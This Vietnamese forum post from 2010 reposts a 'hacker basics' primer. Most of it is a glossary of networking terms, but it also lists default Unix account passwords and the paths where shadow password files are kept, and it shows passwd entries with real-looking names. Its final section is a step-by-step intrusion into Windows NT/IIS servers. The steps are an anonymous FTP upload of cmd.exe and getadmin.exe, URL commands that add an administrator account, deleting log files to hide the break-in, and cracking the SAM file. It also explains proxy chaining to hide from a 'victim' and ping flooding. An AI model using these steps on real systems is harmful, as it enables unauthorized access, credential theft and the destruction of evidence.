Welcome to Miền ký ức Forum's. Nơi những kỷ niệm vẫn còn sống mãi với thời gian....

Đây là những kiến thức tổng quát nhất về hacker EmptyĐây là những kiến thức tổng quát nhất về hacker Empty

Đây là những kiến thức tổng quát nhất về hacker

Share

Go downThông điệp [Trang 1 trong tổng số 1 trang]

9/9/2010, 10:07 am
Quang Trung
Quang Trung


Quản Trị Viên

Quản Trị Viên

Đây là nhng kiến thc tng quát nht v hacker

Hack là như thế nào ? Làm sao để hack ?Nhưng các bạn đã quên mất một điều là các bạn cần phảI có kiến thức một cáchtổng quát , hiểu các thuật ngữ mà những người rành về mạng hay sử dụng . Riêngtôi thì chưa thật giỏi bao nhiêu nhưng qua nghiên cứu tôi cũng đã tổng hợp đượcmột số kiến thức cơ bản , muốn chia sẻ cho tất cả các bạn , nhằm cùng các bạnhọc hỏi . Tôi sẽ không chịu trách nhiệm nếu các bạn dùng nó để quậy phá ngườIkhác . Các bạn có thể copy hoặc post trong các trang Web khác nhưng hãy điềntiên tác giả ở dướI bài , tôn trọng bài viết này cũng chính là tôn trọng tôi vàcông sức của tôi , đồng thờI cũng tôn trọng chính bản thân các bạn . Trong nàytôi cũng có chèn thêm một số cách hack , ***** và ví dụ căn bản , các bạn cóthể ứng dụng thử và nghiên cứu đọc nó để hiểu thêm , rồ khi bắt gặp một từ màcác bạn không hiểu thì hãy đọc bài này để biết , trong này tôi có sử dụng mộtsố ý của bài viết mà tôi thấy rất hay từ trang Web của HVA , và các trang Webkhác mà tôi đã từng ghé thăm . Xin cảm ơn những tác giả đã viết những bài ấy .Bây giờ là vấn đề chính .

1 . ) Ta cần những gì để bắt đầu ?

Có thể nhiều bạn không đồng ý với tôi nhưng cách tốt nhất để thực tập là cácbạn hãy dùng HĐH Window 9X , rồI đến các cái khác mạnh hơn đó là Linux hoặcUnix , dướI đây là những cái bạn cần có :
+ Một cái OS ( có thể là DOS , Window 9X , Linux , Unit ….)
+ Một cái trang Web tốt ( HVA chẳng hạn hi`hi` greenbiggrin.gifgreenbiggrin.gif )
+ Một bộ trình duyệt mạng tốt ( là Nescape , IE , nhưng tốt nhất có lẽ làGozzila )
+ Một công cụ chat tốt ( mIRC ,Yahoo Mass …..)
+ Telnet ( hoặc những cái tương tự như nmap …)
+ Cái quan trọng nhất mà bất cứ ai muốn trở thành một hacker là đều phảI có mộtchút kiến thức về lập trình ( C , C++ , Visual Basic , Pert …..)

2 . ) Thế nào là một địa chỉ IP ?

_ Địa chỉ IP được chia thành 4 số giới hạn từ 0 - 255. Mỗi số được lưu bởi 1byte - > !P có kicks thước là 4byte, được chia thành các lớp địa chỉ. Có 3lớp là A, B, và C. Nếu ở lớp A, ta sẽ có thể có 16 triệu điạ chỉ, ở lớp B có65536 địa chỉ. Ví dụ: Ở lớp B với 132.25,chúng ta có tất cả các địa chỉ từ132.25.0.0 đến 132.25.255.255. Phần lớn các địa chỉ ở lớp A llà sở hữu của cáccông ty hay của tổ chức. Một ISP thường sở hữu một vài địa chỉ lớp B hoặc C. Vídụ: Nếu địa chỉ IP của bạn là 132.25.23.24 thì bạn có thể xác định ISP của bạnlà ai. ( có IP là 132.25.x.)
_ IP là từ viết tắt của Internet Protocol, trên Internet thì địa chỉ IP của mỗIngười là duy nhất và nó sẽ đạI diện cho chính ngườI đó, địa chỉ IP được sử dụngbởi các máy tính khác nhau để nhận biết các máy tính kết nối giữa chúng. Đây làlí do tại sao bạn lại bị IRC cấm, và là cách người ta tìm ra IP của bạn.
Địa chỉ IP có thể dễ dàng phát hiện ra, người ta có thể lấy được qua các cáchsau :
+ bạn lướt qua một trang web, IP của bạn bị ghi lại
+ trên IRC, bất kì ai cũng có thể có IP của bạn
+ trên ICQ, mọi người có thể biết IP của bạn, thậm chí bạn chọn ``do not showip`` người ta vẫn lấy được nó
+ nếu bạn kết nối với một ai đó, họ có thế gõ ``systat –n ``, và biết được aiđang kết nối đên họ
+ nếu ai đó gửi cho bạn một email với một đoạn mã java tóm IP, họ cũng có thểtóm được IP của bạn
( Tài liệu của HVA )

3 . ) Làm thế nào để biết được địa chỉ IP của mình ?

Run đánh lệnh “winipcfg” .è_ Trong Window : vào Start
_ Trong mIRC : kết nốI đến máy chủ sau đó đánh lệnh “/dns ”
_ Thông qua một số trang Web có hiển thị IP .

4 . ) IP Spoofing là gì ?

_ Một số IP có mục đích để xác định một thiết bị duy nhất trên thế giới. Vì vậytrên mạng một máy chủ có thể cho phép một thiết bị khác trao đổi dữ liệu qualại mà không cần kiểm tra máy chủ.
Tuy nhiên có thể thay đổi IP của bạn, nghĩa là bạn có thể gởi một thông tin giảđến một máy khác mà máy đó sẽ tin rằng thông tin nhận được xuất phát từ một máynào đó (tất nhiên là không phải máy của bạn). Bạn có thể vượt qua máy chủ màkhông cần phải có quyền điều khiến máy chủ đó. Điều trở ngại là ở chỗ nhữngthông tin phản hồi từ máy chủ sẽ được gởi đến thiết bị có IP mà chúng ta đã giảmạo. Vì vậy có thể bạn sẽ không có được sự phản hồi những thông tin mà mìnhmong muốn. Có lẽ điều duy nhất mà spoof IP có hiệu quả là khi bạn cần vượt quafirewall, trộm account và cần dấu thông tin cá nhân!
( Tài liệu của HVA )

5 . ) Trojan / worm / virus / logicbomb là cái gì ?

_ Trojan : Nói cho dễ hiểu thì đây là chương trình điệp viên được cài vào máycủa ngườI khác để ăn cắp nhũng tài liệu trên máy đó gửI về cho chủ nhân của nó, Cái mà nó ăn cắp có thể là mật khẩu , accourt , hay cookie ………. tuỳ theo ýmuốn của ngườI cài nó .
_ virus : Nói cho dễ hiểu thì đây là chương trình vớI những mã đặc biệt đượccài ( hoặc lây lan từ máy khác ) lên máy của nạn nhân và thực hiện những yêucầu của mã đó , đa số virut được sử dụng để phá hoạI dữ liệu hoặc phá hoạI máytính .
_ worm : Đây là chương trình độc lập có thể tự nhân bản bản thân nó và lây lankhắp bên trong mạng .Cũng giống như Virut , nó cũng có thể phá hoạI dữ liệu ,hoặc nó có thể phá hoạI bên trong mạng , nhiều khi còn làm down cả mang đó .
_ logicbomb : Là chương trình gửi một lúc nhiều gói dữ liệu cho cùng một địachỉ , làm ngập lụt hệ thống , tắt nghẽn đường truyền ( trên server ) hoặc dùnglàm công cụ để “khủng bố” đốI phương ( bom Mail ) .

6 . ) PGP là gì ?

_ PGP là viết tắt của từ “Pretty Good Privacy” , đây là công cụ sử dụng sự mãhoá chìa khoá công cộng để bảo vệ những hồ sơ Email và dữ liệu , là dạng mã hoáan toàn cao sử dụng phần mềm cho MS_DOS , Unix , VAX/VMS và cho những dạng khác.

7 . ) Proxy là gì ?

_Proxy cung cấp cho người sử dụng truy xuất internet với những host đơn. Nhữngproxy server phục vụ những nghi thức đặt biệt hoặc một tập những nghi thức thựcthi trên dual_homed host hoặc basion host. Những chương trình client của ngườisử dung sẽ qua trung gian proxy server thay thế cho server thật sự mà người sửdụng cần giao tiếp. Proxy server xác định những yêu cầu từ client và quyết địnhđáp ứng hay không đáp ứng, nếu yêu cầu được đáp ứng, proxy server sẽ kết nốivới server thật thay cho client và tiếp tục chuyển tiếp đến những yêu cầu từclientđến server, cũng như đáp ứng những yêu cầu của server đến client. Vì vậyproxy server giống cầu nối trung gian giữa server và client .
_ Proxy cho user truy xuất dịch vụ trên internet theo nghĩa trực tiếp. Với dualhost homed cần phải login vào host trước khi sử dụng dịch vụ nào trên internet.Điều này thường không tiện lợi, và một số người trể nên thất vọng khi họ có cảmgiác thông qua firewall, với proxy nó giải quyết được vấn đề này. Tất nhiên nócòn có những giao thức mới nhưng nói chung nó cũng khá tiện lợi cho user. Bởivì proxy cho phép user truy xuất những dịch vụ trên internet từ hệ thống cánhân của họ, vì vậy nó không cho phép packet đi trực tiếp giữa hệ thống sử dụngvà internet. đường đi là giáng tiếp thông qua dual homed host hoặc thông qua sựkết hợp giữa bastion host và screening rounter.

( Bài viết của Z3RON3 – tài liệu của HVA )

8 . ) Unix là gì ?

_ Unix là một hệ điều hành ( giống Window ) .Nó hiện là hệ điều hành mạnh nhất, và thân thiết với các Hacker nhất . Nếu bạn đã trở thành một hacker thật sựthì HĐH này không thể thiếu đối vớI bạn . Nó được sử dụng hỗ trợ cho lập trìnhngôn ngữ C .

9 . ) Telnet là gì ?

_ Telnet là một chương trình cho phép ta kết nốI đến máy khác thông qua cổng ( port) . MọI máy tính hoặc máy chủ ( server ) đều có cổng , sau đây là một số cổngthông dụng :
+ Port 21: FTP
+ Port 23: Telnet
+ Port 25: SMTP (Mail)
+ Port 37: Time
+ Port 43: Whois
_ Ví dụ : bạn có thể gọI Telnet để kết nốI đến mail.virgin.net trên port 25 .

10 . ) Làm thế nào để biết mình đã Telnet đến hệ thống Unix ?
_ Ok , tôi sẽ nói cho bạn biết làm sao một hệ thống Unix có thể chào hỏI bạnkhi bạn kết nối tới nó . Đầu tiên , khi bạn gọi Unix , thông thường nó sẽ xuấthiện một dấu nhắc : “ Log in : ” , ( tuy nhiên , chỉ với như vậy thì cũng chưachắc chắn đây là Unix được ngoạI trừ chúng xuất hiện thông báo ở trước chữ “log in :” như ví dụ : Welcome to SHUnix. Please log in ….)
Bây giờ ta đang ở tạI dấu nhắc “log in” , bạn cần phảI nhập vào một account hợplệ . Một account thông thường gồm có 8 đặc tính hoặc hơn , sau khi bạn nhậpaccount vào , bạn sẽ thấy có một mật khẩu , bạn hãy thử nhập Default Passwordthử theo bảng sau :

Account-------------------------Default Password


Root----------------------------------------------- Root
Sys------------------------------------------------ Sys / System / Bin
Bin------------------------------------------------ -Sys / Bin
Mountfsy------------------------------------------M ountfsys
Nuuc----------------------------------------------- Anon
Anon----------------------------------------------- Anon
User----------------------------------------------- -User
Games---------------------------------------------G ames
Install-------------------------------------------- --Install
Demo----------------------------------------------- Demo
Guest---------------------------------------------- Guest


11 . ) shell account là cái gì ?

_ Một shell account cho phép bạn sử dụng máy tính ở nhà bạn như thiết bị đầucuốI ( terminal ) mà vớI nó bạn có thể đánh lệnh đến một máy tính đang chạyUnix , “Shell” là chương trình có nhiệm vụ dịch những ký tự của bạn gửi đến rồIđưa vào thực hiện lệnh của chương trình Unix . VớI một shell account chính xácbạn có thể sử dụng được một trạm làm việc mạnh hơn nhiều so vớI cái mà bạn cóthể tưởng tượng đến được .
Bạn có thể lấy được “shell account” miễn phí tạI trang Web [You must be registered and logged in to see this link.] nhiên bạn sẽ không sử dụng được “telnet” cho đến khi bạn trả tiền cho nó .

12 . ) Làm cách nào để bạn có thể Crack Unix account passwords ?

_ Rất đơn giản , tuy nhiên cách mà tôi nói vớI các bạn ở đây “lạc hậu” rồI ,các bạn có thể crack được chúng nếu các bạn may mắn , còn không thì các bạn đọcđể tham khảo .
_ Đầu tiên bạn hãy đăng nhập vào hệ thống có sử dụng Unix như một khách hànghoặc một ngườI khách ghé thăm , nếu may mắn bạn sẽ lấy được mật khẩu được cấtdấu trong những hệ thống chuẩn như :

/etc/passwd

mỗi hàng trong một hồ sơ passwd có một tài khoản khác nhau , nó giống như hàngnày :

userid:password:userid#:groupid#:GECOS field:home dir:shell

trong đó :
+ userid = the user id name : tên đăng nhập : có thể là một tên hoặc một số .
+ password : mật mã . Dùng để làm gì hẳn các bạn cũng biết rồI .
+ userid# : là một số duy nhất đựơc thông báo cho ngườI đăng ký khi họ đăng kýmớI ở lần đầu tiên .
+ groupid# : tương tự như userid# , nhưng nó được dùng cho những ngườI đang ởtrong nhóm nào đó ( như nhóm Hunter Buq của HVA chẳng hạn )
+ GECOS FIELD : đây là nơi chứa thông tin cho ngườI sử dụng , trong đó có họtên đầy đủ , số điện thoại , địa chỉ v.v…. . Đây cũng là nguồn tốt để ta dễdàng ***** một mật khẩu .
+ home dir : là thư mục ghi lạI hoạt động của người khách khi họ ghé thăm (giống như mục History trong IE vậy )
+ Shell : đây là tên của shell mà nó tự động bắt đầu khi ta login .
_ Hãy lấy file password , lấy file text đã mã hoá về , sau đó bạn dùng chươngtrình ``CrackerJack`` hoặc ``John the Ripper`` để ***** .
_ Các bạn thấy cũng khá dễ phảI không ? Sai bét , không dễ dàng và may mắn đểbạn có thể ***** được vì hầu hết bây giờ họ cất rất kỹ , hãy đọc tiếp bạn sẽthấy khó khăn chỗ nào .

13 . ) shadowed password là cái gì ?

_ Một shadowed password được biết đến là trong file Unix passwd , khi bạn nhậpmột mật khẩu , thì ngườI khác chỉ thấy được trình đơn của nó ( như ký hiệu “ X” hoặc “ * ” ) . Cái này thông báo cho bạn biết là file passwd đã được cất giữở nơi khác , nơi mà một ngườI sử dụng bình thường không thể đến được . Không lẽta đành bó tay , dĩ nhiên là đốI vớI một hacker thì không rùi , ta không đếnđược trực tiếp file shadowed password thì ta hãy tìm file sao lưu của nó , đólà file Unshadowed .
Những file này trên hệ thống của Unix không cố định , bạn hãy thử vớI lần lượtnhững đường dẫn sau :

CODE
AIX 3 /etc/security/passwd !
or /tcb/auth/files/ /
A/UX 3.0s /tcb/files/auth/?/ *
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files/ /
SunOS4.1+c2 /etc/security/passwd.adjunct =##username
SunOS 5.0 /etc/shadow
maps/tables/whatever >
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb =20


Trước dấu “ / ”đầu tiên của một hàng là tên của hệ thống tương ứng , hãy căn cứvào hệ thông thật sự bạn muốn lấy rồI lần theo đường dẫn phía sau dấu “/”đầu tiên.
Và cuốI cùng là những account passwd mà tôi từng ***** được , có thể bây giờ nóđã hết hiệu lực rồI :

CODE
arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh
aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh
armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh
arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh
arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh
aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh
arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash
arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh


Để bảo đảm sự bí mật nên pass của họ tôi xoá đi và để vào đó là ký hiệu “ x ” ,các bạn hãy tìm hiểu thông tin có được từ chúng xem .

Hết phần 1

Tác giả: Anhdenday (HVA)
14 . ) Vitual port là gì ?

_ Vitual port ( cổng ảo ) là 1 số tự nhiên đựợc gói ở trong TCP(TranmissionControl Protocol) và UDP(User Diagram Protocol) header. Như mọi nguòi đã biết,Windows có thể chạy nhiều chương trình 1 lúc, mỗi chương trình này có 1 cổngriêng dùng để truyền và nhận dữ liệu. Ví dụ 1 máy có địa chỉ IP là 127.0.0.1chạy WebServer, FTP_Server, POP3 server, etc, những dịch vụ này đều đuọc chạytrên 1 IP address là 127.0.0.1, khi một gói tin đuọc gửi đến làm thế nào máytính của chúng ta phân biệt được gói tin này đi vào dịch vụ nào WebServer hayFTP server hay SM! TP? Chính vì thế Port xuất hiện. Mỗi dịchvụ có 1 số port mặc định, ví dụ FTP có port mặc định là 21, web service có portmặc định là 80, POP3 là 110, SMTP là 25 vân vân....

Người quản trị mạng có thể thay đổi số port mặc định này, nếu bạn ko biết số porttrên một máy chủ, bạn ko thể kết nối vào dịch vụ đó được. Chắc bạn đã từng nghenói đến PORT MAPPING nhưng có lẽ chưa biết nó là gì và chức năng thế nào. Portmapping thực ra đơn giản chỉ là quá trình chuyển đổi số port mặc định của mộtdịch vụ nào đó đến 1 số khác. Ví dụ Port mặc định của WebServer là 80, nhưngthỉnh thoảng có lẽ bạn vẫn thấy [You must be registered and logged in to see this link.] , 8080 ở đây chính là số port củahost xxx nhưng đã đuợc nguòi quản trị của host này ``map`` từ 80 thành 8080.

( Tài liệu của HVA )

15 . ) DNS là gì ?

_ DNS là viết tắt của Domain Name System. Một máy chủ DNS đợi kết nối ở cổng số53, có nghĩa là nếu bạn muốn kết nối vào máy chủ đó, bạn phải kết nối đến cổngsố 53. Máy chủ chạy DNS chuyển hostname bằng các chữ cái thành các chữ số tươngứng và ngược lại. Ví dụ: 127.0.0.1 -- > localhost và localhost--- >127.0.0.1 .

( Tài liệu của HVA )

16 . ) Đôi điều về Wingate :

_ WinGate là một chương trình đơn giản cho phép bạn chia các kết nối ra. Thídụ: bạn có thể chia sẻ 1 modem với 2 hoặc nhiều máy . WinGate dùng với nhiềuproxy khác nhau có thể che giấu bạn .
_ Làm sao để Wingate có thể che dấu bạn ? Hãy làm theo tôi : Bạn hãy telnettrên cổng 23 trên máy chủ chạy WinGate telnet proxy và bạn sẽ có dấu nhắcWinGate > . Tại dấu nhắc này bạn đánh vào tên server, cùng một khoảng trốngvà cổng bạn muốn kết nối vào. VD :

CODE
telnet wingate.net
WinGate > victim.com 23


ta telnet đến cổng 23 vì đây là cổng mặc định khi bạn cài Wingate . lúc này IPtrên máy mà victim chộp được của ta là IP của máy chủ chứa Wingate proxy đó .
_ Làm sao để tìm Wingate ?
+ Nếu bạn muốn tìm IP WinGates tĩnh (IP không đổi) thì đến yahoo hay một trangtìm kiếm cable modem. Tìm kiếm cable modems vì nhiều người dùng cable modems cóWinGate để họ có thể chia sẻ đường truyền rộng của nó cable modems cho nhữngmáy khác trong cùng một nhà . Hoặc bạn có thể dùng Porthay Domain scanners và scan Port 1080 .
+ Để tìm IP động (IP thay đổi mỗi lần user kết nối vào internet) của WinGatesbạn có thể dùng Domscan hoặc các chương trình quét khác . Nếu dùng Domscan bạnhãy nhập khoảng IP bất kỳ vào box đầu tiên và số 23 vào box thứ 2 . Khi đã cókết quả , bạn hãy thử lần lượt telnet đến các địa chỉ IP tìm đựơc ( đã hướngdẫn ở trên ), nếu nó xuất hiện dấu “Wingate > ” thì bạn đã tìm đúng máy đangsử dụng Wingate rồI đó .
+ Theo kinh nghiệm của tôi thì bạn hãy down wingatescanner về mà sài , nó córất nhièu trên mạng .

17 . ) Đôi điều về Traceroute :

_ Traceroute là một chương trình cho phép bạn xác định được đường đi của cácgói packets từ máy bạn đến hệ thống đích trên mạng Internet.
_ bạn hãy xem VD sau :

CODE
C:\windows > tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms


Tôi cần biết đường đi từ máy tôi đến một host trên mạng Internet có địa chỉ iplà 203.94.12.54. Tôi cần phải tracert đến nó! Như bạn thấy ở trên, các góipackets từ máy tôi muốn đến được 203.94.12.54 phải đi qua 13 hops(mắc xích)trên mạng. Đây là đưòng đi của các gói packets .
_ Bạn hãy xem VD tiếp theo :

CODE
host2 # traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms


+ Dòng đầu tiên cho biết hostname và địa chỉ IP của hệ thống đích. Dòng này còncho chúng ta biết thêm giá trị TTL<=30 và kích thước của datagram là 40bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data).
+ Dòng thứ 2 cho biết router đầu tiên nhận được datagram là 202.xy.34.12, giátrị của TTL khi gởi đến router này là 1. Router này sẽ gởi trở lại cho chươngtrình traceroute một ICMP message error ``Time Exceeded``. Traceroute sẽ gởitiếp một datagram đến hệ thống đích.
+ Dòng thứ 3, xyz.com(202.xx.12.34) nhận được datagram có TTL=1(router thứ nhấtđã giảm một trước đó - TTL=2-1=1). Tuy nhiên, xyz.com không phải là một router,nó sẽ gởi trở lại cho traceroute một ICMP error message ``Port Unreachable``.Khi nhận được ICMP message này, traceroute sẽ biết được đã đến được hệ thốngđích xyz.com và kết thúc nhiệm vụ tại đây.
+ Trong trường hợp router không trả lời sau 5 giây, traceroute sẽ in ra một dấusao ``*``(không biết) và tiếp tục gởi datagram khác đến host đích!
_Chú ý:
Trong windows: tracert hostname
Trong unix: traceroute hostname

( Tài liệu của viethacker.net )

18 . ) Ping và cách sử dụng :

_ Ping là 1 khái niệm rât đơn giản tuy nhiênrất hữu ích cho việc chẩn đoán mạng. Tiểu sử của từ ``ping`` như sau: Ping làtiếng động vang ra khi 1 tàu ngầm muốn biết có 1 vật thể khác ở gần mình hayko, nếu có 1 vật thể nào đó gần tàu ngầm tiếng sóng âm này sẽ va vào vật thể đóvà tiếng vang lại sẽ là ``pong`` vậy thì tàu ngầm đó sẽ biết là có gì gần mình.
_Trên Internet, khái niệm Ping cũng rất giốngvới tiểu sử của nó như đã đề cập ở trên. Lệnh Ping gửi một gói ICMP (InternetControl Message Protocol) đến host, nếu host đó ``pong`` lại có nghĩa là hostđó tồn tại (hoặc là có thể với tới đựoc). Ping cũng có thể giúp chúng ta biêtđược luợng thời gian một gói tin (data packet) đi từ máy tính của mình đến 1 hostnào đó.
_Ping thật dễ dàng, chỉ cần mở MS-DOS, và gõ ``ping địa_chỉ_ip``, mặc định sẽping 4 lần, nhưng bạn cũng có thể gõ

CODE
``ping ip.address -t``


Cách này sẽ làm máy ping mãi. Để thay đổi kích thước ping làm như sau:

CODE
``ping -l (size) địa_chỉ_ip ``


Cái ping làm là gửi một gói tin đến một máy tính, sau đó xem xem mất bao lâugói tin rồi xem xem sau bao lâu gói tin đó quay trở lại, cách này xác định đượctốc độ của kết nối, và thời gian cần để một gói tin đi và quay trở lại và chiabốn (gọi là ``trip time``). Ping cũng có thể được dùng để làm chậm đi hoặc đổvỡ hệ thống bằng lụt ping. Windows 98 treo sau một phút lụt ping (Bộ đệm củakết nối bị tràn – có qua nhiều kết nối, nên Windows quyết định cho nó đi nghỉmột chút). Một cuộc tấn công “ping flood” sẽ chiếm rất nhiều băng thông củabạn, và bạn phải có băng thông lớn hơn đối phương ( trừ khi đối phương là mộtmáy chạy Windows 98 và bạn có một modem trung bình, bằng cách đó bạn sẽ hạ gụcđối phương sau xấp xỉ một phút lụt ping). Lụt Ping không hiệu quả lắm đổi vớinhững đối phương mạnh hơn một chút. trừ khi bạn có nhiều đường và bạn kiểm soátmột số lượng tương đối các máy chủ cùng ping mà tổng băng thông lơn hơn đốiphương.
Chú ý: option –t của DOS không gây ra lụt ping, nó chỉ ping mục tiêu một cáchliên tục, với những khoảng ngắt quãng giữa hai lần ping liên tiếp. Trong tất cảcác hệ Unix hoặc Linux, bạn có thể dùng ping -f để gây ra lụt thực sự. Thực tếlà phải ping -f nếu bạn dùng một bản tương thích POSIX (POSIX - Portable OperatingSystem Interface dựa trên uniX), nếu không nó sẽ không phải là một bảnUnix/Linux thực sự, bởi vậy nếu bạn dùng một hệ điều hành mà nó tự cho nó làUnix hay Linux, nó sẽ có tham số -f.

( Tài liệu của HVA và viethacker.net )

19 . ) Kỹ thuật xâm nhập Window NT từ mạng Internet :

_ Đây là bài học hack đầu tiên mà tôi thực hành khi bắt đầu nghiên cứu về hack, bây giờ tôi sẽ bày lại cho các bạn . bạn sẽ cần phảI có một số thờI gian đểthực hiện được nó vì nó tuy dễ nhưng khó . Ta sẽ bắt đầu :
_ Đầu tiên bạn cần tìm một server chạy IIS :
_ Tiếp đến bạn vào DOS và đánh ` FTP `. VD :

c:\Ftp [You must be registered and logged in to see this link.]

( trang naỳ khi tôi thực hành thì vẫn còn làm được , bây giờ không biết họ đãfix chưa , nếu bạn nào có trang nào khác thì hãy post lên cho mọI ngườI cùnglàm nhé )
Nếu connect thành công , bạn sẽ thấy một số dòng tương tự như thế này :

CODE
Connected to [You must be registered and logged in to see this link.]
220 Vdodgy Microsoft FTP Service (Version 3.0).
User ([You must be registered and logged in to see this link.]


Cái mà ta thấy ở trên có chứa những thông tin rất quan trọng , nó cho ta biếttên Netbios của máy tính là “ Vdodgy ” . Từ điều này bạn có thể suy diễn ra tênmà được sử dụng cho NT để cho phép ta có thể khai thác , mặc định mà dịch vụFTP gán cho nó nếu nó chưa đổi tên sẽ là “IUSR_VDODGY” . Hãy nhớ lấy vì nó sẽcó ích cho ta . Nhập ``anonymous” trong user nó sẽ xuất hiện dòng sau :

CODE
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:


Bây giờ passwd sẽ là bất cứ gì mà ta chưa biết , tuy nhiên , bạn hãy thử đánhvào passwd là “anonymous” . Nếu nó sai , bạn hãy log in lạI thiết bị FTP , bạnhãy nhớ là khi ta quay lạI lần này thì không sử dụng cách mạo danh nữa (anonymous ) mà sử dụng “`Guest” , thử lại passwd với “guest” xem thế nào .
Bây giờ bạn hãy đánh lệnh trong DOS :

CODE
Cd /c


Và sẽ nhìn thấy kết quả nếu như bạn đã xâm nhập thành công , bây giờ bạn hãynhanh chóng tìm thư mục `cgi-bin` . Nếu như bạn may mắn , bạn sẽ tìm được dễdàng vì thông thường hệ thống quản lý đã đặt `cgi-bin` vào nơi mà ta vừa xâmnhập để cho các ngườI quản lý họ dễ dàng điều khiển mạng hơn . thư mục cgi-bincó thể chứa các chương trình mà bạn có thể lợi dụng nó để chạy từ trình duyệtWeb của bạn . Ta hãy bắt đầu “quậy” nào greenbiggrin.gif greenbiggrin.gif .
_ Đầu tiên , bạn hãy chuyển tớ thư mục cgi-bin và sử dụng lệnh “Binary” ( cóthể các bạn không cần dùng lệnh này ) , sau đó bạn dánh tiếp lệnh “put cmd.exe”. Tiếp theo là bạn cần có file hack để cài vào thư mục này , hãy tìm trên mạngđể lấy 2 file quan trọng nhất đó là `getadmin.exe` và `gasys.dll` . Downloadchúng xuống , một khi bạn đã có nó hãy cài vào trong thư mục cgi-bin . Ok , coinhư mọI việc đã xong , bạn hãy đóng cửa sổ DOS .
Bây giờ bạn hãy đánh địa chỉ sau lên trình duyệt của bạn :

[You must be registered and logged in to see this link.]

Sau vài giây bạn sẽ có được câu trả lời như ở dướI đây :

CODE
CGI Error
The specified CGI application misbehaved by not returning a complete set ofHTTP headers. The headers it did return are:
Congratulations , now account IUSR_VDODGY have administrator rights!


Thế là bạn đã mạo danh admin để xâm nhập hệ thống , việc cần thiết bây giờ làbạn hãy tự tạo cho mình một account , hãy đánh dòng sau trên IE :

[You must be registered and logged in to see this link.]bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20toilahacker%20/add

dòng lệnh trên sẽ tạo cho bạn một account login với user : anhdenday và passwd: toilahackerBây giờ bạn hãy là cho user này có account của admin , bạn chỉ cầnđánh lên IE lệnh :

[You must be registered and logged in to see this link.]tadmin.exe?anhdenday

Vậy là xong rùi đó , bạn hãy disconnect và đến start menu - > find rồisearch computer `[You must be registered and logged in to see this link.] Khi tìm thấy , bạn vào explore , explore NTsẽ mở ra bạn hay nhập user và passwd để mở nó ( của tôi là user : anhdenday vàpasswd : toilahacker ) .

Có một vấn đề là khi bạn xâm nhập hệ thống này thì sẽ bị ghi lại , do đó để xoádấu vết bạn hãy vào `Winnt\system32\logfiles` mở file log đó rồI xoá nhữngthông tin liên quan đến bạn , rồI save chúng . Nếu bạn muốn lấy một thông báogì về việc chia sẽ sự xâm nhập thì bạn hãy thay đổi ngày tháng trên máy tínhvớI URL sau :

[You must be registered and logged in to see this link.]d.exe?/c%20date%2030/04/03

xong rồI bạn hãy xoá file `getadmin.exe`, và `gasys.dll` từ `cgi-bin` . Mục đíchkhi ta xâm nhập hệ thống này là “chôm” pass của admin để lần sau xâm nhập mộtcách hợp lệ , do đó bạn hãy tìm file SAM ( chứa pass của admin và member )trong hệ thống rồI dùng chương trình “l0pht *****” để ***** pass ( Hướng dẫn vềcách sử dụng “l0pht ***** v 3.02” tôi đã post lên rồi ,các bạn hãy tự nghiêncứu nhé ) . Đây là link : [You must be registered and logged in to see this link.]f=6&t=11566&s=
Khi ***** xong các bạn đã có user và pass của admin rồI , bây giờ hãy xoáaccount của user ( của tôi là “anhdenday” ) đi cho an toàn . Bạn đã có thể làmgì trong hệ thống là tuỳ thích , nhưng các bạn đừng xoá hết tài liệu của họ nhé, tội cho họ lắm .
Bạn cảm thấy thế nào , rắc rối lắm phải không . Lúc tôi thử hack cách này , tôiđã mày mò mất cả 4 giờ , nếu như bạn đã quen thì lần thứ 2 bạn sẽ mất ít thờIgian hơn .

Ở phần 3 tôi sẽ đề cập đến HĐH Linux , đến cách ngắt mật khẩu bảo vệ của mộtWeb site , và làm thế nào để hack một trang web đơn giản nhất .v.v…

Hết phần 220 . ) Cookie là gì ?

